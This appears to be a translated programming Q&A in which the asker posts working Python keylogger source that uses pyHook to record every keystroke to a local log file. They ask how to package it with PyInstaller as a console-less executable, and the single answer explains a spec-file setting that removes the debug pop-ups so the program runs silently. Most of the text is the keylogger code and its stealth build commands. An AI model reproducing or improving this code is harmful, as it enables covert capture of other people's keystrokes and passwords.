使用带有-noconsole的Pyinstaller会改为弹出窗口

时间:2016-07-05 21:48:15

标签: python console popup exe pyinstaller

我有python文件,用.pyw保存以禁止控制台

import pyHook, pythoncom, sys, logging

file_log = 'C:\\Lets_Create_Malware\\log.txt'

def OnKeyboardEvent (event):
    logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
    chr(event.Ascii)
    logging.log(10,chr(event.Ascii))
    return True

hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()

然后我用pyinstaller转换为.exe,

c:\Python27\Malware>pyinstaller --debug --onefile --noupx keylogger.pyw

但是当我双击.exe时,我会得到控制台

enter image description here

我试过--noconsole选项,即

c:\Python27\Malware>pyinstaller --debug --onefile --noupx --noconsole keylogger.pyw

但是当我双击.exe时,我会得到一系列烦人的弹出窗口,我必须用任务管理器终止它。

如何解决?

enter image description here

1 个答案:

答案 0 :(得分:2)

请创建.spec文件,然后在EXE部分添加

  

调试=假

PyInstaller手册解释了规范文件here。然后使用spec文件而不是脚本文件调用pyinstaller。